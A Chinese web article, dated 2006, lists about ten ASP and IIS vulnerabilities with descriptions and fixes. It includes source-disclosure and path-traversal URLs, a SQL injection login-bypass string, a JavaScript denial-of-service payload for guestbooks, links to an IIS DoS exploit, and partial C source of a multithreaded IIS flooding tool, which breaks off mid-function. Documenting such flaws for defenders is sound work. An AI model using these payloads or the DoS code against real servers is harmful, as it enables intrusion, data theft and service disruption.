分享
 
 
 

ASP漏洞分析和解决方法

王朝asp·作者佚名  2006-12-16
窄屏简体版  字體: |||超大  

有人说一台不和外面联系的电脑是最安全的电脑,一个关闭所有端口,不提供任何服务的电脑也是最安全的。黑客经常利用我

们所开放的端口实施攻击,这些攻击最常见的是DDOS(拒绝服务攻击).下面我会列出ASP的二十几个漏洞,每个漏洞都会有漏洞描

述和解决方法。

1 在ASP程序后加个特殊符号,能看到ASP源程序

受影响的版本:

win95+pws

IIS3.0

98+pws4 不存在这个漏洞。

IIS4.0以上的版本也不存在这个漏洞。

问题描述:

这些特殊符号包括小数点,%81, ::$DATA。比如:

http://someurl/somepage.asp.

http:// someurl/somepage.asp%81

http:// someurl/somepage.asp::$DATA

http:// someurl/somepage.asp %2e

http:// someurl/somepage %2e%41sp

http:// someurl/somepage%2e%asp

http:// someurl/somepage.asp %2e

http://someurl/msadc/samples/selector/showcode.asp?source=/msadc/samples/../../../../../../boot.ini (可以

看到boot.ini的文件内容)

那么在安装有IIS3.0和win95+PWS的浏览中就很容易看到somepage.asp的源程序。究竟是什么原因造成了这种可怕的漏洞呢?

究其根源其实是 Windows NT 特有的文件系统在做怪。有一点常识的人都知道在 NT 提供了一种完全不同于 FAT 的文件系统:

NTFS,这种被称之为新技术文件系统的技术使得 NT 具有了较高的安全机制,但也正是因为它而产生了不少令人头痛的隐患。大家

可能不知道, NTFS 支持包含在一个文件中 的多数据流,而这个包含了所有内容的主数据流被称之为"DATA",因此使得在浏览器

里直接访问 NTFS 系统的这个特性而轻易的捕获在文件中的脚本程序成为了可能。然而 直接导致 ::$DATA 的原因是由于 IIS 在

解析文件名的时候出了问题,它没有很好地规范文件名。

解决方法和建议:

如果是Winodws NT用户,安装IIS4.0或者IIS5.0,Windows2000不存在这个问题。如果是win95用户,安装WIN98和PWS4.0。

2 ACCESS mdb 数据库有可能被下载的漏洞

问题描述:

在用ACCESS做后台数据库时,如果有人通过各种方法知道或者猜到了服务器的ACCESS数据库的路径和数据库名称,那么他能够

下载这个ACCESS数据库文件,这是非常危险的。比如:如果你的ACCESS数据库book.mdb放在虚拟目录下的database目录下,那么

有人在浏览器中打入:

http:// someurl/database/book.mdb

如果你的book.mdb数据库没有事先加密的话,那book.mdb中所有重要的数据都掌握在别人的手中。

解决方法:

(1) 为你的数据库文件名称起个复杂的非常规的名字,并把他放在几目

录下。所谓"非常规",打个比方:比如有个数据库要保存的是有关书籍的信息,可不要把他起个"book.mdb"的名字,起个怪怪的名

称,比如d34ksfslf.mdb,再把他放在如./kdslf/i44/studi/ 的几层目录下,这样黑客要想通过猜的方式得到你的ACCESS数据库

文件就难上加难了

(2)不要把数据库名写在程序中。有些人喜欢把DSN写在程序中,比如:

DBPath = Server.MapPath("cmddb.mdb")

conn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath

假如万一给人拿到了源程序,你的ACCESS数据库的名字就一览无余。因此建议你在ODBC里设置数据源,再在程序中这样写:

conn.open "shujiyuan"

(3)使用ACCESS来为数据库文件编码及加密。首先在选取"工具->安

全->加密/解密数据库,选取数据库(如:employer.mdb),然后接确定,接着会出现"数据库加密后另存为"的窗口,存为:

employer1.mdb。接着employer.mdb就会被编码,然后存为employer1.mdb..

要注意的是,以上的动作并不是对数据库设置密码,而只是对数据库文件加以编码,目的是为了防止他人使用别的工具来查看

数据库文件的内容。

接下来我们为数据库加密,首先以打开经过编码了的employer1.mdb,在打开时,选择"独占"方式。然后选取功能表的"工具-

>安全->设置数据库密码",接着输入密码即可。

为employer1.mdb设置密码之后,接下来如果再使用ACCEES数据库文件时,则ACCESS会先要求输入密码,验证正确后才能够启

动数据库。

不过要在ASP程序中的connection对象的open方法中增加PWD的参数即可,例如:

param="driver={Microsoft Access Driver (*.mdb)};Pwd=yfdsfs"

param=param&";dbq="&server.mappath("employer1.mdb")

conn.open param

这样即使他人得到了employer1.mdb文件,没有密码他是无法看到employer1.mdb的。

3 code.asp文件会泄漏ASP代码

问题描述:

举个很简单的例子,在微软提供的 ASP1.0 的例程里有一个 .asp 文件,专门用来查看其它 .asp 文件的源代码,该文件为

ASPSamp/Samples/code.asp。如果有人把这个程序上传到服务器,而服务器端没有任何防范措施的话,他就可以很容易地查看他

人的程序。例如 :

code.asp?source=/directory/file.asp

不过这是个比较旧的漏洞了,相信现在很少会出现这种漏洞。

下面这命令是比较新的:

http://someurl/iissamples/exair/howitworks/code.asp?/lunwen/soushuo.asp=xxx.asp

最大的危害莫过于asa文件可以被上述方式读出;数据库密码以明文形式暴露在黑客眼前;

问题解决或建议:

对于IIS自带的show asp code的asp程序文件,删除该文件或者禁止访问该目录即可

4、filesystemobject 组件篡改下载 fat 分区上的任何文件的漏洞

问题描述:

IIS3、 IIS4 的 ASP 的文件操作都可以通过 filesystemobject 实现,包括文本文件的读写目录操作、文件的拷贝改名删

除等,但是这个强大的功能也留下了非常危险的 "后门"。利用 filesystemobjet 可以篡改下载 fat 分区上的任何文件。即使

是 ntfs 分区,如果权限没有设定好的话,同样也能破坏,一不小心你就可能遭受"灭顶之灾 "。遗憾的是很多 webmaster 只知

道让 web 服务器运行起来,很少对 ntfs 进行权限 设置,而 NT 目录权限的默认设置偏偏安全性又低得可怕。因此,如果你是

Webmaster,建议你密切关注服务器的设置,尽量将 web 目录建在 ntfs 分区上,目录不要设定 everyone full control,即使

是是管理员组的成员一般也没什么必要 full control,只要有读取、更改权限就足够了。 也可以把filesystemobject的组件删

除或者改名。

||||||5、输入标准的HTML语句或者javascript语句会改变输出结果

问题描述:

在输入框中打入标准的HTML语句会得到什么相的结果呢?

比如一个留言本,我们留言内容中打入:

<font size=10>你好!</font>

如果你的ASP程序中没有屏蔽html语句,那么就会改变"你好"字体的大小。在留言本中改变字体大小和贴图有时并不是什么坏

事,反而可以使留言本生动。但是如果在输入框中写个 javascript 的死循环,比如:<a herf="http://someurl"

onMouseover="while(1){window.close('/')}">特大新闻</a>

那么其他查看该留言的客人只要移动鼠标到"特大新闻",上就会使用户的浏览器因死循环而死掉。

解决方法和建议:

编写类似程序时应该做好对此类操作的防范,譬如可以写一段程序判断客户端的输入,并屏蔽掉所有的 HTML、 Javascript

语句。

6、ASP程序密码验证漏洞

漏洞描述:

很多网站把密码放到数据库中,在登陆验证中用以下sql,(以asp为例)

sql="select * from user where username='"&username&"'and pass='"& pass &'"

此时,您只要根据sql构造一个特殊的用户名和密码,如:ben' or '1'='1

就可以进入本来你没有特权的页面。再来看看上面那个语句吧:

sql="select * from user where username='"&username&"'and pass='"& pass&'"

此时,您只要根据sql构造一个特殊的用户名和密码,如:ben' or '1'='1

这样,程序将会变成这样: sql="select*from username where username="&ben'or'1'=1&"and pass="&pass&"

or 是一个逻辑运算符,作用是在判断两个条件的时候,只要其中一个条件成立,那么等式将会成立.而在语言中,是以1来代表真的(成

立).那么在这行语句中,原语句的"and"验证将不再继续,而因为"1=1"和"or"令语句返回为真值.。

另外我们也可以构造以下的用户名:

username='aa' or username<>'aa'

pass='aa' or pass<>'aa'

相应的在浏览器端的用户名框内写入:aa' or username<>'aa 口令框内写入:aa' or pass<>'aa,注意这两个字符串两头是

没有'的。这样就可以成功的骗过系统而进入。

后一种方法理论虽然如此,但要实践是非常困难的,下面两个条件都必须具备。

1. 你首先要能够准确的知道系统在表中是用哪两个字段存储用户名和口令的,只有这样你才能准确的构造出这个进攻性的字符

串。实际上这是很难猜中的。

2.系统对你输入的字符串不进行有效性检查。

问题解决和建议:

对输入的内容验证和"'"号的处理。

7、IIS4或者IIS5中安装有INDEX SERVER服务会漏洞ASP源程序

问题描述:

在运行IIS4或者IIS5的Index Server,输入特殊的字符格式可以看到ASP源程序或者其它页面的程序。甚至以及添打了最近关

于参看源代码的补丁程序的系统,或者没有.htw文件的系统,一样存在该问题。获得asp程序,甚至global.asa文件的源代码,无

疑对系统是一个非常重大的安全隐患。往往这些代码中包含了用户密码和ID,以及数据库的源路径和名称等等。这对于攻击者收集

系统信息,进行下一步的入侵都是非常重要的。

通过构建下面的特殊程序可以参看该程序源代码:

http://202.116.26.38/null.htw?CiWebHitsFile=/default.asp&CiRestriction=none&CiHiliteType=Full

这样只是返回一些html格式的文件代码,但是当你添加%20到CiWebHitsFile的参数后面,如下:

http://someurl/null.htw?CiWebHitsFile=/default.asp%20&CiRestriction=none&CiHiliteType=Full

这将获得该程序的源代码。

(注意:/default.asp是以web的根开始计算。如某站点的http:///welcome/welcome.asp

那么对应就是:

http://someurl/null.htw?CiWebHitsFile=/welcome/welcome.asp%20&CiRestriction=none&CiHiliteType=Full

)

由于'null.htw'文件并非真正的系统映射文件,所以只是一个储存在系统内存中的虚拟文件。哪怕你已经从你的系统中删除了

所有的真实的.htw文件,但是由于对null.htw文件的请求默认是由webhits.dll来处理。所以,IIS仍然收到该漏洞的威胁。

问题解决或者建议:

如果该webhits提供的功能是系统必须的,请下载相应的补丁程序。如果没必要,请用IIS的MMC管理工具简单移除.htw的映象

文件。

补丁程序如下:

Index Server 2.0:

Intel:

http://www.microsoft.com/downloads/release.asp?ReleaseID=17727

Alpha:

http://www.microsoft.com/downloads/release.asp?ReleaseID=17728

Indexing Services for Windows 2000:

Intel:

http://www.microsoft.com/downloads/release.asp?ReleaseID=17726

8.绕过验证直接进入ASP页面。

漏洞描述:

如果用户知道了一个ASP页面的路径和文件名,而这个文件又是要经过验证才能进去的,但是用户直接输入这个ASP页面的文件

名,就有可能通过绕过验证.比如:我在一些网站上这样试过:首先关闭所有的浏览器,窗口,输入:

http://someurl/system_search.asp?page=1

就样就看到了只能系统员才能看到的页面。当然有些人为了防止这种情况也会在system_search.asp的开头加个判断,比如:

判断session("system_name"),如果不为空时就能进入,这样上面的url请求就不能直接进入管理员页面了。但是这种方法也有一

个漏洞,如果攻击者先用一个合法的帐号,或者在本机上生成一个session,如session("system_name")="admi",那因为

session("system_name")不为空,这样也能直接进入绕过密码,直接进入管理员页面。

解决方法:

在需要验证的ASP页面开头处进行相应的处理。比如:可跟踪上一个页面的文件名,只有从上一页面转进来的会话才能读取这个

页面。

||||||9、IIS4.0/5.0特殊数据格式的URL请求远程DOS攻击

漏洞描述:

当在安装有有IIS4.0或者IIS5.0的web服务上,请求一个具有特殊数据格式的URL,会拖慢受攻击web服务器的响应速度,或许会

使其暂时停止响应。

受影响的版本:

MicrosoftInternetInformationServer4.0

MicrosoftInternetInformationServer5.0

漏洞测试程序如下:

http://202.96.168.51/download/exploits/iisdos.exe

源代码如下:

http://202.96.168.51/download/exploits/iisdos.zip

测试程序:

只要打入:iisdos<***.***.**.**>就能攻击对方web服务器

问题解决:

InternetInformationServer4.0:

http://www.microsoft.com/Downloads/Release.asp?ReleaseID=20906

InternetInformationServer5.0:

http://www.microsoft.com/Downloads/Release.asp?ReleaseID=20904

更多的信息:

http://www.microsoft.com/technet/security/bulletin/ms00-030.asp

Microsoft安全公告MS00-021:

http://www.microsoft.com/technet/security/bulletin/fq00-030.asp

相关连接

http://www.ussrback.com

10. IIS web server DOS

漏洞描述:

默认情况下,IIS容易被拒绝服务攻击。如果注册表中有一个叫 "MaxClientRequestBuffer" 的键未被创建,针对这种NT系

统的攻击通常能奏效。 "MaxClientRequestBuffer" 这个键用于设置IIS允许接受的输入量。如果 "MaxClientRequestBuffer"

设置为256(bytes),则攻击者通过输入大量的字符请求IIS将被限制在256字节以内。而系统的缺省设置对此不加限制,因此,利用

下面的程序。可以很容易地对IIS server实行DOS攻击:

#include <stdio.h>

#include <windows.h>

#define MAX_THREAD 666

void cng();

char *server;

char *buffer;

int port;

int counter = 0;

int current_threads = 0;

int main(int argc, char **argv)

{

WORD tequila;

WSADATA data;

int p;

DWORD tid;

HANDLE hThread[2000];

//This code is as is and sucks as it is. Won't exit correctly and a lot

of other fun things.

//That I didn't want to take the time to do. So just ctrl+c out of the

code.

//Load up cnghack.exe 3 times for charm.

printf("CNG IIS DoS.\nMarc@eEye.com\nhttp://www.eeye.com\n\"For my

beloved.\"\n");

if(argc<2){

printf("Usage: %s [server] [port]\n",argv[0]);

exit(1);

}

buffer=malloc(17500);

memset( buffer, 'A', strlen(buffer));

server=argv[1];

port=atoi(argv[2]);

tequila = MAKEWORD( 1, 1 );

printf("Attempting to start winsock... ");

if( (WSAStartup(tequila, &data)) !=0 ){

printf("failed to start winsock.\n");

exit(1);

}

else{

printf("started winsock.\n\n");

}

counter = 0;

for(p = 0 ; p < MAX_THREAD ; ++p ){

hThread[counter] = CreateThread(0,

0,

(LPTHREAD_START_ROUTINE) cng,

( void * )++counter,

0,

&tid);

}

Sleep(250);

while( current_threads )

Sleep(250);

counter = 0;

printf("Terminated Threads.\n");

while (counter < MAX_THREAD)

{

TerminateThread( hThread[counter], 0 );

++counter;

}

WSACleanup();

return 0;

}

void cng()

{

int SockFD=0, p;

struct sockaddr_in DstSAin;

char GETKILLED[]="GET / HTTP/\r\n";

int die=1;

printf("Entered CNG\n");

++current_threads;

DstSAin.sin_family = AF_INET;

[1] [2] 下一页

 
 
 
免责声明:本文为网络用户发布,其观点仅代表作者个人观点,与本站无关,本站仅提供信息存储服务。文中陈述内容未经本站证实,其真实性、完整性、及时性本站不作任何保证或承诺,请读者仅作参考,并请自行核实相关内容。
2023年上半年GDP全球前十五强
 百态   2023-10-24
美众议院议长启动对拜登的弹劾调查
 百态   2023-09-13
上海、济南、武汉等多地出现不明坠落物
 探索   2023-09-06
印度或要将国名改为“巴拉特”
 百态   2023-09-06
男子为女友送行,买票不登机被捕
 百态   2023-08-20
手机地震预警功能怎么开?
 干货   2023-08-06
女子4年卖2套房花700多万做美容:不但没变美脸,面部还出现变形
 百态   2023-08-04
住户一楼被水淹 还冲来8头猪
 百态   2023-07-31
女子体内爬出大量瓜子状活虫
 百态   2023-07-25
地球连续35年收到神秘规律性信号,网友:不要回答!
 探索   2023-07-21
全球镓价格本周大涨27%
 探索   2023-07-09
钱都流向了那些不缺钱的人,苦都留给了能吃苦的人
 探索   2023-07-02
倩女手游刀客魅者强控制(强混乱强眩晕强睡眠)和对应控制抗性的关系
 百态   2020-08-20
美国5月9日最新疫情:美国确诊人数突破131万
 百态   2020-05-09
荷兰政府宣布将集体辞职
 干货   2020-04-30
倩女幽魂手游师徒任务情义春秋猜成语答案逍遥观:鹏程万里
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案神机营:射石饮羽
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案昆仑山:拔刀相助
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案天工阁:鬼斧神工
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案丝路古道:单枪匹马
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野:与虎谋皮
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野:李代桃僵
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野:指鹿为马
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案金陵:小鸟依人
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案金陵:千金买邻
 干货   2019-11-12
 
推荐阅读
 
 
 
>>返回首頁<<
 
靜靜地坐在廢墟上,四周的荒凉一望無際,忽然覺得,淒涼也很美
© 2005- 王朝網路 版權所有